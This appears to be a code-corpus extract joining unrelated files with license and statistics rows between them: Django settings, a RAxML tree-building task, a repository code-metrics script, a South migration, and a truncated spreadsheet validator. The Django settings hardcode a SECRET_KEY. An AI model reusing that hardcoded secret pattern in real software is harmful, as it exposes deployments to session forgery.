# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h3az0-*^)c!%ur(=_+a88ehr=uf9j$6**r1#1#-%j2h8_&w!c^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'YAAS.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'YAAS.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'YAASApp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| mit | 1,969,944,859,881,598,000 | 33.246753 | 108 | 0.660464 | false | 3.690007 | false | false | false |
jhcepas/npr | nprlib/task/raxml.py | 1 | 8790 | import os
import sys
import logging
import re
import shutil
from glob import glob
log = logging.getLogger("main")
from nprlib.master_task import TreeTask
from nprlib.master_job import Job
from nprlib.utils import (basename, Tree, OrderedDict,
GLOBALS, RAXML_CITE, pjoin, DATATYPES, md5)
from nprlib import db
__all__ = ["Raxml"]
class Raxml(TreeTask):
def __init__(self, nodeid, alg_file, constrain_id, model,
seqtype, conf, confname, parts_id=None):
GLOBALS["citator"].add(RAXML_CITE)
base_args = OrderedDict()
self.bootstrap = conf[confname].get("_bootstrap", None)
model = model or conf[confname]["_aa_model"]
self.confname = confname
self.conf = conf
self.alg_phylip_file = alg_file
try:
self.constrain_tree = db.get_dataid(constrain_id, DATATYPES.constrain_tree)
except ValueError:
self.constrain_tree = None
self.partitions_file = parts_id
TreeTask.__init__(self, nodeid, "tree", "RaxML",
base_args, conf[confname])
max_cores = GLOBALS["_max_cores"]
appname = conf[confname]["_app"]
if max_cores > 1:
threads = conf["threading"].get("raxml-pthreads")
if threads > 1:
appname = appname.replace("raxml", "raxml-pthreads")
raxml_bin = conf["app"][appname]
else:
appname = appname.replace("raxml-pthreads", "raxml")
threads = 1
raxml_bin = conf["app"][appname]
self.raxml_bin = raxml_bin
self.threads = threads
self.seqtype = seqtype
# Process raxml options
method = conf[confname].get("_method", "GAMMA").upper()
if seqtype.lower() == "aa":
self.model_string = 'PROT%s%s' %(method, model.upper())
self.model = model
elif seqtype.lower() == "nt":
self.model_string = 'GTR%s' %method
self.model = "GTR"
else:
raise ValueError("Unknown seqtype %s", seqtype)
#inv = conf[confname].get("pinv", "").upper()
#freq = conf[confname].get("ebf", "").upper()
self.init()
def load_jobs(self):
args = OrderedDict(self.args)
args["-s"] = pjoin(GLOBALS["input_dir"], self.alg_phylip_file)
args["-m"] = self.model_string
args["-n"] = self.alg_phylip_file
if self.constrain_tree:
log.log(24, "Using constrain tree %s" %self.constrain_tree)
args["-g"] = pjoin(GLOBALS["input_dir"], self.constrain_tree)
if self.partitions_file:
log.log(24, "Using alg partitions %s" %self.partitions_file)
args['-q'] = pjoin(GLOBALS["input_dir"], self.partitions_file)
tree_job = Job(self.raxml_bin, args, parent_ids=[self.nodeid])
tree_job.jobname += "-"+self.model_string
tree_job.cores = self.threads
# Register input files necessary to run the job
tree_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
tree_job.add_input_file(self.constrain_tree)
if self.partitions_file:
tree_job.add_input_file(self.partitions_file)
self.jobs.append(tree_job)
self.out_tree_file = os.path.join(tree_job.jobdir,
"RAxML_bestTree." + self.alg_phylip_file)
if self.bootstrap == "alrt":
alrt_args = tree_job.args.copy()
if self.constrain_tree:
del alrt_args["-g"]
if self.partitions_file:
alrt_args["-q"] = args['-q']
alrt_args["-f"] = "J"
alrt_args["-t"] = self.out_tree_file
alrt_job = Job(self.raxml_bin, alrt_args,
parent_ids=[tree_job.jobid])
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.cores = self.threads
# Register necessary input files
alrt_job.add_input_file(self.alg_phylip_file)
if self.partitions_file:
alrt_job.add_input_file(self.partitions_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
elif self.bootstrap == "alrt_phyml":
alrt_args = {
"-o": "n",
"-i": self.alg_phylip_file,
"--bootstrap": "-2",
"-d": self.seqtype,
"-u": self.out_tree_file,
"--model": self.model,
"--quiet": "",
"--no_memory_check": "",
}
#if self.constrain_tree:
# alrt_args["--constraint_tree"] = self.constrain_tree
alrt_job = Job(self.conf["app"]["phyml"],
alrt_args, parent_ids=[tree_job.jobid])
alrt_job.add_input_file(self.alg_phylip_file, alrt_job.jobdir)
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.add_input_file(self.alg_phylip_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
else:
# Bootstrap calculation
boot_args = tree_job.args.copy()
boot_args["-n"] = "bootstraps."+boot_args["-n"]
boot_args["-N"] = int(self.bootstrap)
boot_args["-b"] = 31416
boot_job = Job(self.raxml_bin, boot_args,
parent_ids=[tree_job.jobid])
boot_job.jobname += "-%d-bootstraps" %(boot_args['-N'])
boot_job.dependencies.add(tree_job)
boot_job.cores = self.threads
# Register necessary input files
boot_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
boot_job.add_input_file(self.constrain_tree)
if self.partitions_file:
boot_job.add_input_file(self.partitions_file)
self.jobs.append(boot_job)
# Bootstrap drawing on top of best tree
bootd_args = tree_job.args.copy()
if self.constrain_tree:
del bootd_args["-g"]
if self.partitions_file:
del bootd_args["-q"]
bootd_args["-n"] = "bootstrapped."+ tree_job.args["-n"]
bootd_args["-f"] = "b"
bootd_args["-t"] = self.out_tree_file
bootd_args["-z"] = pjoin(boot_job.jobdir, "RAxML_bootstrap." + boot_job.args["-n"])
bootd_job = Job(self.raxml_bin, bootd_args,
parent_ids=[tree_job.jobid])
bootd_job.jobname += "-bootstrapped"
bootd_job.dependencies.add(boot_job)
bootd_job.cores = self.threads
self.jobs.append(bootd_job)
self.boot_job = boot_job
self.bootd_job = bootd_job
def finish(self):
#first job is the raxml tree
def parse_alrt(match):
dist = match.groups()[0]
support = float(match.groups()[1])/100.0
return "%g:%s" %(support, dist)
if self.bootstrap == "alrt":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
"RAxML_fastTreeSH_Support." + self.alrt_job.args["-n"])
raw_nw = open(alrt_tree_file).read()
try:
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw, flags=re.MULTILINE)
except TypeError:
raw_nw = raw_nw.replace("\n","")
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw)
if nsubs == 0:
log.warning("alrt values were not detected in raxml tree!")
tree = Tree(nw)
elif self.bootstrap == "alrt_phyml":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
self.alg_phylip_file +"_phyml_tree.txt")
tree = Tree(alrt_tree_file)
else:
alrt_tree_file = os.path.join(self.bootd_job.jobdir,
"RAxML_bipartitions." + self.bootd_job.args["-n"])
nw = open(alrt_tree_file).read()
tree = Tree(nw)
tree.support = 100
for n in tree.traverse():
if n.support >1:
n.support /= 100.
else:
n.support = 0
TreeTask.store_data(self, tree.write(), {})
| gpl-3.0 | -4,085,692,445,470,686,700 | 37.384279 | 102 | 0.502958 | false | 3.632231 | false | false | false |
JoeJasinski/WindyTransit | mobiletrans/mtlocation/migrations/0002_auto__chg_field_location_uuid__chg_field_transitroute_uuid__chg_field_.py | 1 | 9992 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
def backwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'mtlocation.gplace': {
'Meta': {'object_name': 'GPlace', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'international_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'local_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'rating': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'types': ('mobiletrans.mtlocation.fields.SeparatedValuesField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vicinity': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.hospital': {
'Meta': {'object_name': 'Hospital', '_ormbases': [u'mtlocation.Location']},
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.landmark': {
'Meta': {'object_name': 'Landmark', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'architect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'build_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'landmark_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.library': {
'Meta': {'object_name': 'Library', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.location': {
'Meta': {'object_name': 'Location'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.neighborhood': {
'Meta': {'object_name': 'Neighborhood', '_ormbases': [u'mtlocation.Region']},
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.region': {
'Meta': {'object_name': 'Region'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'area': ('django.contrib.gis.db.models.fields.PolygonField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.transitroute': {
'Meta': {'object_name': 'TransitRoute'},
'color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'route_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'})
},
u'mtlocation.transitstop': {
'Meta': {'object_name': 'TransitStop', '_ormbases': [u'mtlocation.Location']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'location_type': ('django.db.models.fields.IntegerField', [], {}),
'route': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['mtlocation.TransitRoute']", 'null': 'True', 'blank': 'True'}),
'stop_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'stop_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.zipcode': {
'Meta': {'object_name': 'Zipcode', '_ormbases': [u'mtlocation.Region']},
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['mtlocation']
| mit | 6,730,425,070,483,890,000 | 74.12782 | 177 | 0.560348 | false | 3.520789 | false | false | false |
jeppe-style/code-quality-and-popularity | static_code_metrics.py | 1 | 4112 | import json
import os
import subprocess
import git
import pandas
import shutil
from git import Repo
from shared_constants import data_dir, repo_candidates_filename
temp_repo_dir = "temp-repo"
code_metrics_file = "code-metrics.csv"
code_metrics_folder = "code-metrics"
def read_json(filename):
print("reading result from {}/{}".format(data_dir, filename))
with open("{}/{}.json".format(data_dir, filename), "r") as file:
data = json.load(file)
return data
def main():
# for all repos
candidate_repos = read_json(repo_candidates_filename)
# create the folder where to store the code metrics
if not os.path.exists("{}/{}".format(data_dir, code_metrics_folder)):
os.makedirs("{}/{}".format(data_dir, code_metrics_folder))
metrics = None
for i in range(0, len(candidate_repos)):
# for i in range(0, 10):
# create the folder where to store the repos temporarily
if not os.path.exists(temp_repo_dir):
os.makedirs(temp_repo_dir)
candidate_repo = candidate_repos[i]
# download repo
git_url = candidate_repo["html_url"]
repo_name = candidate_repo["name"]
print("============================================")
print("cloning repository {}".format(repo_name))
try:
Repo.clone_from(git_url, temp_repo_dir)
except git.exc.GitCommandError:
print("error cloning repository")
continue
# calculate code metrics on last snapshot
print("calculating code metrics")
repo_id = candidate_repo["id"]
output_file = "{}/{}/{}-{}".format(data_dir, code_metrics_folder, repo_id, code_metrics_file)
if not compute_metrics(output_file):
continue
temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)
if metrics is None:
metrics = temp_frame
else:
            metrics = pandas.concat([metrics, temp_frame], ignore_index=True)
        # remove the clone so the next iteration starts from an empty
        # directory; otherwise Repo.clone_from fails on the non-empty temp dir
        shutil.rmtree(temp_repo_dir)
print("save data to csv")
metrics.to_csv("{}/final-{}".format(data_dir, code_metrics_file))
    # the loop already removed the temp dir; ignore_errors covers that case
    shutil.rmtree(temp_repo_dir, ignore_errors=True)
def compute_metrics(output_file):
# e.g "Exception in thread "main" java.lang.NullPointerException..."
# java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv
# subprocess.run("java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar {} {}"
# .format(temp_repo_dir, output_file), shell=True)
try:
subprocess.run(
" ".join(
["java", "-jar", "ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar", temp_repo_dir, output_file]
),
shell=True, check=True,
timeout=60 * 10
)
except subprocess.CalledProcessError:
print("exception analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
except subprocess.TimeoutExpired:
print("timeout analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
return True
def prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):
# analyse code quality vs stars and num contributors
print("preparing data")
metrics_raw = pandas.read_csv(output_file)
metrics_raw.pop("file")
metrics_raw.pop("class")
metrics_raw.pop("type")
# for each metric compute mean, median, Q1, and Q3
mean = metrics_raw.mean().rename(lambda x: "average_{}".format(x))
median = metrics_raw.median().rename(lambda x: "median_{}".format(x))
q1 = metrics_raw.quantile(q=0.25).rename(lambda x: "Q1_{}".format(x))
q3 = metrics_raw.quantile(q=0.75).rename(lambda x: "Q3_{}".format(x))
temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T
temp_frame['id'] = repo_id
temp_frame['name'] = repo_name
temp_frame['stars'] = candidate_repo["stargazers_count"]
temp_frame['contributors_total'] = candidate_repo["num_contributors"]
return temp_frame
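# Illustrative (assumed) shape of one row returned above: one column per CK
# metric aggregate, e.g. average_wmc, median_wmc, Q1_wmc, Q3_wmc, ..., plus
# the metadata columns id, name, stars and contributors_total. The exact
# metric names depend on the header of the CSV the CK jar writes.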
if __name__ == '__main__':
main()
| mit | -8,530,514,884,157,262,000 | 31.634921 | 110 | 0.621109 | false | 3.648625 | false | false | false |
cligu/gitdox | modules/validation/ether_validator.py | 1 | 13538 | from validator import Validator
from collections import defaultdict
import re
class EtherValidator(Validator):
def __init__(self, rule):
self.corpus = rule[0]
self.doc = rule[1]
self.domain = rule[2]
self.name = rule[3]
self.operator = rule[4]
self.argument = rule[5]
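    # Example rule tuple, as unpacked above (an illustration inferred from the
    # indices used in __init__, not a documented gitdox rule format):
    #   ("gum",          # corpus name pattern
    #    None,           # document name pattern (None = any document)
    #    "ether",        # domain
    #    "norm",         # spreadsheet column the rule applies to
    #    "~",            # operator: regex match
    #    r"^[A-Za-z]+$") # argument consumed by the operator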
def _apply_exists(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named '" + self.name + "' not found<br/>"
return report, tooltip, cells
def _apply_doesntexist(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) > 0:
report += "Columns named '" + self.name + "' are not allowed<br/>"
cells += [letter + "1" for letter in col_letters]
return report, tooltip, cells
def _apply_span_equals_number(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named " + self.name + " not found<br/>"
return report, tooltip, cells
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
if self.argument == "1":
if cell.span != "1":
report += "Cell " + cell.col + cell.row + ": span is not 1<br/>"
cells.append(cell.col + cell.row)
else:
if cell.span != "" and cell.span != self.argument:
report += "Cell " + cell.col + cell.row + ": span is not " + self.argument + "<br/>"
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _apply_regex(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
match = re.search(self.argument, cell.content)
if match is None:
report += ("Cell " + cell.col + cell.row
+ ": content does not match pattern " + self.argument + "<br/>")
tooltip += ("Cell " + cell.col + cell.row + ":<br/>"
+ "Content: " + cell.content + "<br/>"
+ "Pattern: " + self.argument + "<br/>")
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _binary_op_check_cols_exist(self, colmap):
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
if len(name_letters) == 0:
if self.operator != "==":
return "Column named " + self.name + " not found<br/>"
if len(arg_letters) == 0:
if self.operator != "==":
return "Column named " + self.argument + " not found<br/>"
return ""
def _binary_op_setup(self, parsed_ether):
colmap = parsed_ether['__colmap__'] # name -> list of col letters
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
name_tuples = defaultdict(list)
arg_tuples = defaultdict(list)
start_rows = defaultdict(list)
all_rows = []
for letter in name_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
# "de-merge" cell so we have an entry for every row in its span with its letter and content
                for i in range(max(int(cell.span or 1), 1)):  # empty span counts as 1
row = str(int(cell.row) + i)
name_tuples[row].append((letter, cell.content))
all_rows.append(row)
# same as above with arg_letters
for letter in arg_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
                for i in range(max(int(cell.span or 1), 1)):  # empty span counts as 1
row = str(int(cell.row) + i)
arg_tuples[row].append((letter, cell.content))
if row not in all_rows:
all_rows.append(row)
name_start_cells = []
name_start_rows = set() # for O(1) lookup
for letter in name_letters:
name_start_cells += [(letter, row) for row in start_rows[letter]]
name_start_rows = name_start_rows.union(set(row for row in start_rows[letter]))
arg_start_cells = []
arg_start_rows = set()
for letter in arg_letters:
arg_start_cells += [(letter, row) for row in start_rows[letter]]
arg_start_rows = arg_start_rows.union(set(row for row in start_rows[letter]))
return name_letters, arg_letters, name_tuples, arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, arg_start_cells, arg_start_rows
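    # Worked example (hypothetical) of the "de-merge" performed above: a cell
    # in column A starting at row 2 with span 3 and content "NP" yields
    #   name_tuples["2"] == name_tuples["3"] == name_tuples["4"] == [("A", "NP")]
    # while start_rows["A"] records only "2", the row where the span begins.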
def _apply_subspan(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
# check to see if all cells in rhs are contained within cells on lhs
if row in arg_tuples and row not in name_tuples:
for letter, _ in arg_tuples[row]:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " must appear in the span of a cell in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length_and_content(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for i in range(min(len(name_tuples[row]), len(arg_tuples[row]))):
name_letter, name_content = name_tuples[row][i]
arg_letter, arg_content = arg_tuples[row][i]
if arg_content != name_content and (row in start_rows[arg_letter] or row in start_rows[name_letter]):
cells.append(name_letter + row)
cells.append(arg_letter + row)
report += ("Cells " + name_letter + row
+ " and " + arg_letter + row
+ " must have equivalent content.<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_rule(self, parsed_ether):
